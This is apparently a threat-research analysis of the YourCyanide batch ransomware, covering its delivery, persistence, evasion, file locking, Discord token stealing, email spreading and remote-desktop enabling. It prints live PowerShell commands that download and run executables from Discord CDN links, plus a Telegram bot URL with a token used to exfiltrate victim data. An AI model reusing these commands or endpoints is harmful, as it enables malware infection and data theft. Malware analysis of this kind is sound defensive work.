Authors: Anandeshwar Unnikrishnan, Rishika Desai, Benila Susan Jacob
CloudSEK’s contextual AI digital risk monitoring platform XVigil came across CMD-based Ransomware strain YourCyanide being exploited in the wild. YourCyanide uses Discord, Microsoft Office and Pastebin as part of its payload download mechanism by making Discord attachments and URL requests.
An analysis into the impacts of the ransomware reveals that it can be utilized to compromise confidential business details, practices and IP. There is also a potential risk of takeover or shutdown of company operations resulting in loss of revenue and reputation.
The mitigation measures consist of auditing and monitoring logs of events and incidents to identify unusual patterns and behaviour. There has to be a systematic mechanism of enforcing data protection, back and recovery. Additionally security configurations on network infrastructure devices like firewall and routers have to be implemented.
Analysis and Attribution of YourCynaide
CloudSEK’s Threat Research team has conducted an investigation into the new and sophisticated ‘YourCyanide’ ransomware, which is being exploited in the wild.
This CMD-based ransomware strain is distributed primarily as a Discord attachment and makes URL requests to Microsoft Office and Pastebin. Researchers at Trend Micro discovered that the roots of YourCyanide can be traced back to the GonnaCope ransomware family that first surfaced in April, 2022.
Features of the Malware
CloudSEK’s Threat Research team discovered the following features of YourCyanide ransomware and its operators:
- The ransomware execution file is delivered as a Discord attachment as shown below:
|Ransomware delivery: (new-object net.webclient).downloadfile(“https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe”, “GetToken.exe”)
Ransomware delivery: (new-object net.webclient).downloadfile(“https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe”, “NoKeyB.exe”)
- The obfuscated file of YourCyanide, when deobfuscated fetches the executable GetToken.exe.
- The ransomware encrypts files and renames them with a .cyn extension.
- The .cmd file of YourCyanide module is dropped by another malicious file CaffeJuice.exe.
- The ransom note path is C:\Users\Admin\Desktop\YcynNote.txt.
- The threat actor shares their name, BTC wallet address, contact channel and number of files encrypted in the ransom note.
- The ransomware group usually demands USD 500 from their victims to restore their files.
Association with APT/ Other ransomware groups
- The YourCyanide sample available, indicates that it could be a variant of the Kekpop ransomware (also known as Kekware); the ransomware drops an ‘other.txt’ file that mentions Kekpop. Our research also confirms that the same Get.exe executable is used to deliver Kekpop and YourCyanide ransomware.
- Another similarity that links Kekpop and YourCyanide is the ‘black.bat’ file that is dropped in both instances.
Technical Analysis of the YourCyanide Ransomware
A malicious LNK file “powershell.exe.lnk” executes a Powershell command that retrieves the executable “YourCyanide.exe” from the Discord server, and executes it on the victim system to launch YourCyanide ransomware.
|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command “(New-Object Net.WebClient).DownloadFile(‘https://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe’, ‘YourCyanide.exe’)”; start YourCyanide.exe|
Delivery Mechanism – Dropper
The malicious binary YourCyanide.exe, downloaded by the LNK file, acts as a ransomware dropper. It performs the following operations on the system:
- YourCyanide.exe creates a new directory “IXP000.TMP” in the user’s Temp directory.
- It dumps YourCyanide.cmd into the newly created directory. The contents of the file are shown in the following image.
- The dropper executes the batch script to fetch contents from Pastebin and saves it as YourCyanide.cmd, which is the actual ransomware written in batch script.
- Before exiting, the dropper deletes the dropped file and the directory in Temp.
- The main ransomware code fetched from Pastebin is heavily obfuscated with multiple layers of string substitutions and slicing, to hinder its analysis or detection.
- A further analysis of the deobfuscated code shows that the batch program sets its system and hidden attributes as shown below:
- The hidden attribute, when set, hides the corresponding file from the user, while the system attribute deceives the operating system to treat the file as crucial. Thus, at the event of alteration or deletion, such files remain unaffected similar to system files.
- The malware achieves persistence through the following AutoStart Extensibility Points:
- Run Registry Key
- Startup Folder
- The malware creates a new value “rundll32_474_toolbar” under Run Key in the registry and provides the name of the malicious batch file as data for the new registry entry. Finally, a copy of the malware is saved in the Startup folder. Once the malware achieves persistence, it creates a new batch file “AuToexEc.BAT” in the C:\ drive.
- The BAT file consists of the command to start a new process of the same malware copy. Later the Task Manager is disabled through the registry. All of these operations are shown in the image below.
- The malware also checks for the existence of AUTOEXEC.BAT on the victim system. And if found, it is replaced with itself as shown below. In the older DOS system AUTOEXEC.BAT was used as an auto execution mechanism, post the system boot.
- Additionally, the ransomware checks for the analysis environment by verifying the username. These usernames are all taken from popular sandboxes on the internet. The malware exits the system if the username matches any of the usernames mentioned in the code below.
- A file named “black.bat” is dropped in the user’s Documents directory. The contents are dynamically written into the dropped batch as shown below. The dropped batch file executes a black screensaver by calling the scrnsave.scr file. The execution of the file causes the user’s screen to go blank.
The malware terminates the following services on the target system:
The malware terminates the following running processes on the system:
|Running Processes Targeted|
After terminating various protective services and running tasks, the malware locks the data on the target system as shown below. The following directories and its sub directories are traversed to perform locking:
The files are renamed to a random number obtained from multiplying random numbers, followed by which an extension of “cyn” is appended. Once the files are renamed, random data is written to the user file.
The malware drops another batch file named “2b2crypt.cmd” to lock Minecraft related data as shown below. The logic used for locking is the same as seen before. The “.minecraft” and “.minecraft\mods” directories are targeted by the malware as shown below. After writing the contents of the batch file, it is executed to initiate locking of the data.
The Logger Script
- Using Powershell, the malware retrieves another batch file “ycynlog.cmd” and executes it on the target system.
- The “ycynlog.cmd” is heavily obfuscated with the same logic used for the main ransomware batch file. The batch instructions hosted on Pastebin are shown below. This malicious script acts as a user data logger and sends the data to a Telegram bot (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538).
- The ycynlog.cmd script just like the main ransomware script initiates the execution by setting Run registry keys to achieve persistence on the target system and also drops the ycynlog.cmd file in the Startup folder.
- The logger script downloads an additional executable file hosted on Discord CDN and executes it on the system.
- GetToken is a C#/ .NET program used to steal users’ Discord tokens. The stealer contains hard coded directory paths to Discord and various web browser’s local storage as shown in the image below.
- The tokens are identified by using Regex pattern matching as shown below. If a match is found, the stealer checks the validity of the token by calling the function TokenUtil.checkToken.
- The token validity is performed by connecting to the Discord server and monitoring the server response. The token checking routine is shown below. The valid tokens are returned to the caller function.
- The stealer creates a file Tokens.txt on the victim system and dumps all valid tokens found. If there are no tokens present, the value that gets written into Tokens.txt is “Retard Has No tokens.” The ransomware finally sends the Token.txt to the Telegram bot.
- The global IP address of the victim is retrieved by sending a request to https://ipv4.wtfismyip.com/text through curl and the output is stored as IP.txt.
- The script retrieves a list of installed applications on the system and stores it in apps.txt to later send it to the Telegram bot.
- WMI is used extensively to retrieve system level information from the user. The following list summarizes the data enumerated by the script:
- IP address (local)
- Network configuration data
- MAC information
- CPU data
- Physical memory data
- Disk information like partition details
- Windows system information
- Windows license information (Product Key)
- The above data along with Tokens.txt generated by GetToken.exe are sent to the Telegram bot. Additionally, the logger scripts steal the following Minecraft specific user data:
- Using Powershell the logger script downloads ForMe.txt from Google Cloud and executes it on the system.
- The ForMe.exe dumps data into ForMe.txt which is later pushed to the Telegram bot. Unfortunately, at the time of our analysis the Google Cloud link did not serve the file. Our research indicates that it could be a browser password stealer.
- The ransomware script then drops a batch file named “fuckports.cmd.” Instructions to add custom firewall rules are written into the batch file as shown below. The following firewall rules allow inbound UDP traffic to port 2835 and outbound UDP traffic through 16981.
- The malware adds itself into the win.ini and system.ini files. These files contain configuration files to start up programs and other settings after a system boot. The malware drops two batch files, “confession.bat” and “Check This Out.bat,” that have identical purposes.
- YourCyanide is also capable of spreading via mail. It utilizes Visual Basic APIs to communicate with Microsoft Outlook and sends out a copy of itself as mail attachment. The malware then drops “loveletter.vbs” in the Documents directory.
- The VB script retrieves the user’s address list and sends out an email with the subject “I have a crush on you” and a message that states “read me.” The mail attachment contains a copy of the ransomware batch program.
- The malware drops an additional vbs file named “mail.vbs” with the same contents as mentioned above. However, it will send an email with the subject line “Check This Out.”
- The ransomware uses the Powershell Out-Printer commandlet to print out multiple copies of the ransom note.
- The malware also copies itself to other drives present on the system as shown below:
- Notably, YouCyanide changes the file association of vbs, sln, js, css, and ini. Upon opening such files, the system transfers their control to an associated program. The malware associates listed file types with itself. The malware is executed when similar file types are opened.
- The malware enables remote desktop on the target system as shown below and starts the TermService or terminal service which is responsible for handling RDP related tasks.
- Finally the ransom note is displayed to the user and creates an autorun configuration for available drives on the system that leads to execution of the malware itself as shown below.
Impact & Mitigation
Indicators of Compromise (IoCs)